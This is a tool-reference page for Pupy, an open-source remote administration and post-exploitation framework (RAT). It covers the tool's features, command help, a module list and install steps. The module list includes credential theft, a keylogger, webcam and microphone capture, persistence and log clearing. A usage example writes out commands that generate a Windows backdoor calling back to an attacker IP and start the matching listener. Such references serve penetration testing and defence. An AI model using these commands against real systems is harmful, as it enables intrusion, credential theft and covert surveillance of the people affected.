You are here: Home » Exploitation Tools » Pupy

Pupy

Pupy Description

Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python

Pupy is a cross-platform, multi function RAT and post-exploitation tool mainly written in python. It features an all-in-memory execution guideline and leaves a very low footprint. Pupy can communicate using multiple transports, migrate into processes using reflective injection, and load remote python code, python packages and python C-extensions from memory.

Features:

  • Windows payload can load the entire Python interpreter from memory using a reflective DLL.
  • Pupy does not touch the disk.
  • Can be packed into a single .py file and run without any dependencies other than the python standard library on all OSes.
  • PyCrypto gets replaced by pure Python AES & RSA implementations when unavailable.
  • Reflectively migrate into other processes.
  • Remotely import pure python packages (.py, .pyc) and compiled python C extensions (.pyd, .so) from memory.
  • Imported python modules do not touch the disk.
  • Easily extensible, modules are simple to write and are sorted by os and category.
  • Modules can directly access python objects on the remote client using rpyc.
  • Access remote objects interactively from the pupy shell and get auto-completion of remote attributes.
  • Communication transports are modular and stackable. Exfiltrate data using HTTP over HTTP over AES over XOR, or any combination of the available transports.
  • Communicate using obfsproxy pluggable transports.
  • Execute noninteractive commands on multiple hosts at once.
  • Commands and scripts running on remote hosts are interruptible.
  • Auto-completion for commands and arguments.
  • Custom config can be defined: command aliases, modules. automatically run at connection, etc.
  • Open interactive python shells with auto-completion on the all-in-memory remote python interpreter.
  • Interactive shells (cmd.exe, /bin/bash, etc) can be opened remotely.
  • Remote shells on Unix & Windows clients have a real tty with all keyboard signals working just like an SSH shell.
  • Execute PE executable remotely and from memory.
  • Generate payloads in various formats:
Format Architecture Short Name
Android Package x86 & ARMv7 apk
Linux Binary x86 lin_x86
Linux Binary x64 lin_x64
Linux Shared Object x86 so_x86
Linux Shared Object x64 so_x64
Windows PE Executable x86 exe_x86
Windows PE Executable x64 exe_x64
Windows DLL x86 dll_x86
Windows DLL x64 dll_x64
Python Script x86 & x64 py
PyInstaller x86 & x64 pyinst
Python Oneliner x86 & x64 py_oneliner
Powershell x86 & x64 ps1
Powershell Oneliner x86 & x64 ps1_oneliner
Ducky Script N/A rubber_ducky
  • Deploy in memory from a single command line using python or powershell one-liners.
  • Embed "scriptlets" in generated payloads to perform some tasks "offline" without needing network connectivity (ex: start keylogger, add persistence, execute custom python script, check_vm, etc.)
  • Multiple Target Platforms:
Platform Support Status
Windows XP Supported
Windows 7 Supported
Windows 8 Supported
Windows 10 Supported
Linux Supported
Mac OSX Limited Support
Android Limited Support

Homepage: https://github.com/n1nj4sec/pupy

Author: Nicolas VERDIER

License: AS IS

Pupy Help

gen Help

Usage:

gen          [-f {client,py,pyinst,py_oneliner,ps1,ps1_oneliner,rubber_ducky,csharp,.NET,.NET_oneliner}]
                 [-O {android,windows,linux,solaris}] [-A {x86,x64}] [-U]
                 [-P PACKER] [-S] [-o OUTPUT]
                 [-d   ] [-D OUTPUT_DIR]
                 [-s SCRIPTLET] [-l] [-E] [--no-use-proxy]
                 [--oneliner-nothidden] [--debug-scriptlets] [--debug]
                 [--workdir WORKDIR]
                 [{bind,auto_proxy,dnscnc,connect}] ...

Options:

positional arguments:
  {bind,auto_proxy,dnscnc,connect}
                        Choose a launcher. Launchers make payloads behave
                        differently at startup.
  launcher_args         launcher options

optional arguments:
  -h, --help            show this help message and exit
  -f {client,py,pyinst,py_oneliner,ps1,ps1_oneliner,rubber_ducky,csharp,.NET,.NET_oneliner}, --format {client,py,pyinst,py_oneliner,ps1,ps1_oneliner,rubber_ducky,csharp,.NET,.NET_oneliner}
                        (default: client)
  -O {android,windows,linux,solaris}, --os {android,windows,linux,solaris}
                        Target OS (default: windows)
  -A {x86,x64}, --arch {x86,x64}
                        Target arch (default: x86)
  -U, --uncompressed    Use uncompressed template
  -P PACKER, --packer PACKER
                        Use packer when 'client' output format (default: )
  -S, --shared          Create shared object
  -o OUTPUT, --output OUTPUT
                        output filename
  -d <ATTEMPTS> <MIN SEC> <MAX SEC>, --delays-list <ATTEMPTS> <MIN SEC> <MAX SEC>
                        Format: <max attempts> <min delay (sec)> <max delay
                        (sec)>
  -D OUTPUT_DIR, --output-dir OUTPUT_DIR
                        output folder (default: /root/.config/pupy/output)
  -s SCRIPTLET, --scriptlet SCRIPTLET
                        offline python scriptlets to execute before starting
                        the connection. Multiple scriptlets can be privided.
  -l, --list            list available formats, transports, scriptlets and
                        options
  -E, --prefer-external
                        In case of autodetection prefer external IP
  --no-use-proxy        Don't use the target's proxy configuration even if it
                        is used by target (for ps1_oneliner only for now)
  --oneliner-nothidden  Powershell script not hidden target side (default:
                        False)
  --debug-scriptlets    don't catch scriptlets exceptions on the client for
                        debug purposes
  --debug               build with the debug template (the payload open a
                        console)
  --workdir WORKDIR     Set Workdir (Default = current workdir)

listen Help

Usage:

listen [-h] [-l | -L | -a TRANSPORT [TRANSPORT_ARG1 ...] | -A TRANSPORT
              [TRANSPORT_ARG1 ...] | -r TRANSPORT]

Options:

  -h, --help            show this help message and exit
  -l, --list            show current listeners
  -L, --list-transports
                        show available transports
  -a TRANSPORT [TRANSPORT_ARG1 ...], --add TRANSPORT [TRANSPORT_ARG1 ...]
                        start listener
  -A TRANSPORT [TRANSPORT_ARG1 ...], --add-no-pproxy TRANSPORT [TRANSPORT_ARG1 ...]
                        start listener (ignore pproxy)
  -r TRANSPORT, --remove TRANSPORT
                        stop listener

connect Help

Usage:

connect [-h] -c <host:port>
               [-t {obfs3,http,ssl,ecm,tcp_cleartext,dfws,rsa,udp_secure,kc4,ec4,ws,scramblesuit,udp_cleartext,ssl_rsa}]

Options:

positional arguments:
  transport_args        Transport arguments: key=value key=value ...

optional arguments:
  -h, --help            show this help message and exit
  -c <host:port>, --host <host:port>
                        host:port of the pupy server to connect to. You can
                        provide multiple --host arguments to attempt to
                        connect to multiple IPs
  -t {obfs3,http,ssl,ecm,tcp_cleartext,dfws,rsa,udp_secure,kc4,ec4,ws,scramblesuit,udp_cleartext,ssl_rsa}, --transport {obfs3,http,ssl,ecm,tcp_cleartext,dfws,rsa,udp_secure,kc4,ec4,ws,scramblesuit,udp_cleartext,ssl_rsa}
                        The transport to use

sessions Help

Usage:

sessions [-h] [-i ] [-g] [-k ] [-K] [-d ] [-D]

Options:

  -h, --help            show this help message and exit
  -i <filter>, --interact <filter>
                        change the default --filter value for other commands
  -g, --global-reset    reset --interact to the default global behavior
  -k <id>               Kill the selected session
  -K                    Kill all sessions
  -d <id>               Drop the connection (abruptly close the socket)
  -D                    Drop all connections

jobs Help

Usage:

jobs [-h] [-k  | -K ] [-l] [-p ]

Options:

  -h, --help            show this help message and exit
  -k <job_id>, --kill <job_id>
                        print the job current output before killing it
  -K <job_id>, --kill-no-output <job_id>
                        kill job without printing output
  -l, --list            list jobs
  -p <job_id>, --print-output <job_id>
                        print a job output

run Help

Usage:

run [-h] [-1] [-o OUTPUT] [-f ] [-b] <module> ...

Options:

positional arguments:
  <module>              module
  <arguments>           module arguments

optional arguments:
  -h, --help            show this help message and exit
  -1, --once            Unload new deps after usage
  -o OUTPUT, --output OUTPUT
                        save command output to file.%t - timestamp, %h - host,
                        %m - mac, %c - client shortname, %M - module name, %p
                        - platform, %u - user, %a - ip address
  -f <client filter>, --filter <client filter>
                        filter to a subset of all clients. All fields
                        available in the "info" module can be used. example:
                        run get_info -f 'platform:win release:7 os_arch:64'
  -b, --background      run in background

Modules

CATEGORY  NAME               HELP                                                                                                                           
---------------------------------------------------------------------------------------------------------------
admin     shares             List Local And Remote Shared Folder And Permission
admin     ls                 List System Files
admin     wmic               Query Wmi Using Wql
admin     psh                Load/Execute Powershell Scripts
admin     ssh                Ssh Client
admin     rfs                Mount Remote Fs As Fuse Fs To Mountpoint
admin     smbspider          Walk Through A Smb Directory And Recursively Search A String Into Files
admin     reg                Search/List/Get/Set/Delete Registry Keys/Values
admin     shell_exec         Execute Shell Commands On A Remote System
admin     logs               Show Logs (Or Try To Search Something)
admin     alive              Request To Send Keepalive Packets On Rpyc Level
admin     rdesktop           Start A Remote Desktop Session Using A Browser Websocket Client
admin     cp                 Copy File Or Directory
admin     interactive_shell  Open An Interactive Command Shell With A Nice Tty
admin     rm                 Remove A File Or A Directory
admin     smb                Copy Files Via Smb Protocol
admin     hibernate          Close Session During X Hours
admin     netstat            List Terminal Sessions
admin     drives             List Valid Drives In The System
admin     become             Become User
admin     sshell             Interactive Ssh Shell
admin     last               List Terminal Sessions
admin     rdp                Enable / Disable Rdp Connection Or Check For Valid Credentials On A Remote Host
admin     w                  List Terminal Sessions
admin     getdomain          Get Primary Domain Controller
admin     cd                 Change Directory
admin     date               Get Current Date
admin     pexec              Execute Shell Commands Non-Interactively On A Remote System In Background Using Popen
admin     ps                 List Processes
admin     zip                Zip / Unzip File Or Directory
admin     mkdir              Create An Empty Directory
admin     dns                Retrieve Domain Name From Ip And Vice Versa
admin     clear_logs         Clear Event Logs
admin     psexec             Launch Remote Commands Using Smbexec Or Wmiexec
admin     pyexec             Execute Python Code On A Remote System
admin     beroot             Check For Privilege Escalation Path
admin     cat                Show Contents Of A File
admin     pyshell            Open An Interactive Python Shell On The Remote Client
admin     mv                 Move File Or Directory
admin     display            Set Display Variable
admin     ip                 List Interfaces
admin     sudo_alias         Write An Alias For Sudo To Retrieve User Password
admin     igd                Upnp Igd Client
admin     stat               Show A Bit More Info About File Path. Acls/Caps/Owner For Now
admin     http               Trivial Get/Post Requests Via Http Protocol
admin     x509               Fetch Certificate From Server
admin     getppid            List Parent Process Information
admin     getpid             List Process Information
admin     services           List Services
admin     getuid             Get Username
admin     pwd                Get Current Working Dir
creds     loot_memory        Crawl Processes Memory And Look For Cleartext Credentials
creds     creddump           Download The Hives From A Remote Windows System And Dump Creds
creds     lazagne            Retrieve Passwords Stored On The Target
creds     mimipy             Run Mimipy To Retrieve Credentials From Memory
creds     memstrings         Dump Printable Strings From Process Memory For Futher Analysis
exploit   mimishell          Execute Mimikatz From Memory (Interactive)
exploit   mimikatz           Execute Mimikatz From Memory (Non-Interactive)
exploit   exploit_suggester  Exploit Suggester
exploit   shellcode_exec     Executes The Supplied Shellcode On A Client
exploit   impersonate        List/Impersonate Process Tokens
gather    keylogger          A Keylogger To Monitor All Keyboards Interaction Including The Clipboard <img draggable="false" class="emoji" alt="🙂" src="https://s.w.org/images/core/emoji/12.0.0-1/svg/1f642.svg">
gather    hashmon            Try To Find Clear Text Passwords In Memory
gather    get_info           Get Some Informations About One Or Multiple Clients
gather    contacts           To Get Contacts
gather    isearch            Use Windows Search Index To Search For Data
gather    search             Walk Through A Directory And Recursively Search A String Into Files
gather    check_vm           Check If Running On Virtual Machine
gather    outlook            Interact With Outlook Session Of The Targeted User
gather    record_mic         Record Sound With The Microphone !
gather    pywerview          Rewriting Of Some Powerview'S Functionalities In Python
gather    apps               To Interact Manage Applications
gather    call               To Get Call Details
gather    gpstracker         To Interact With Gps
gather    mouselogger        Log Mouse Clicks And Take Screenshots Of Areas Around It
gather    powerview          Execute Powerview Commands
gather    get_hwuuid         Try To Get Uuid (Dmi) Or Machine-Id (Dbus/Linux)
gather    webcamsnap         Take A Webcam Snap
gather    usniper            Globally Capture String Or Register During Execution At Specified
gather    cloudinfo          Retrieve Ec2/Digitalocean Metadata
gather    users              Get Interactive Users
gather    screenshot         Take A Screenshot
gather    ttyrec             Globally Capture Intput/Output To Tty. Compatible With Kernels
general   exit               Exit The Client On The Other Side
general   process_kill       Kill A Process
manage    upload             Upload A File/Directory To A Remote System
manage    edit               Edit Remote File Locally (Download->Edit->Upload)
manage    hide_process       Edit Current Process Argv & Env Not To Look Suspicious
manage    download           Download A File/Directory From A Remote System
manage    getprivs           Manage Current Process Privileges
manage    tasks              Get Info About Registered Background Tasks
manage    memory_exec        Execute A Executable From Memory
manage    lock_screen        Lock The Session
manage    duplicate          Duplicate The Current Pupy Payload By Executing It From Memory
manage    load_package       Load A Python Package Onto A Remote Client. Packages Files Must Be Placed In One Of The Pupy/Packages/<Os>/<Arch>/ Repository
manage    migrate            Migrate Pupy Into Another Process Using Reflective Dll Injection
manage    write              Write Short String To File
manage    env                List/Get/Set/Unset Client Environment Variables
manage    persistence        Enable / Disable Persistence
network   port_scan          Run A Tcp Port Scan
network   forward            Local/Remote Port Forwarding And Socks Proxy
network   tcpdump            Module To Reproduce Some Of The Classic Tcpdump Tool Functions
privesc   getsystem          Try To Get Nt Authority System Privileges
privesc   bypassuac          Be Carefull, Most Of Bypass Methods Are Detected By Av...
privesc   inveigh            Execute Inveigh Commands
privesc   privesc_checker    Linux Privilege Escalation Scripts
troll     text_to_speach     Use Android Text To Speach To Say Something
troll     vibrate            Activate The Phone/Tablet Vibrator
troll     msgbox             Pop Up A Custom Message Box

Usage Example Pupy

Create an executable backdoor file (-f client) for a 64-bit version (-A x64) of Windows (-O windows), which after launch will connect to the attacker's computer (connect) which has an IP address of 192.168.1.112 and is listening to the port 43210 (--host 192.168.1.112:43210), while using HTTP-like syntax (-t http) as a transport:

gen -f client -O windows -A x64 connect --host 192.168.1.112:43210 -t http

Starting a listener on an attacker's computer waiting for a connection using an HTTP similar transport (http) on port 43210:

listen -a http 43210

How to install Pupy

For details on installation, see the article ‘How to install Pupy’.

How to install Pupy in Kali Linux

sudo apt install git libssl1.0-dev libffi-dev python-dev python-pip build-essential swig tcpdump python-virtualenv
git clone --recursive https://github.com/n1nj4sec/pupy
cd pupy
python create-workspace.py -DG pupyw
sudo pip2 install rpyc==3.4.4

How to install Pupy in BlackArch

sudo pacman -S pupy
sudo pacman -Rdd python2-rpyc
sudo pip2 install rpyc==3.4.4

Pupy Screenshots

Pupy Tutorials

Related tools

Also recommended: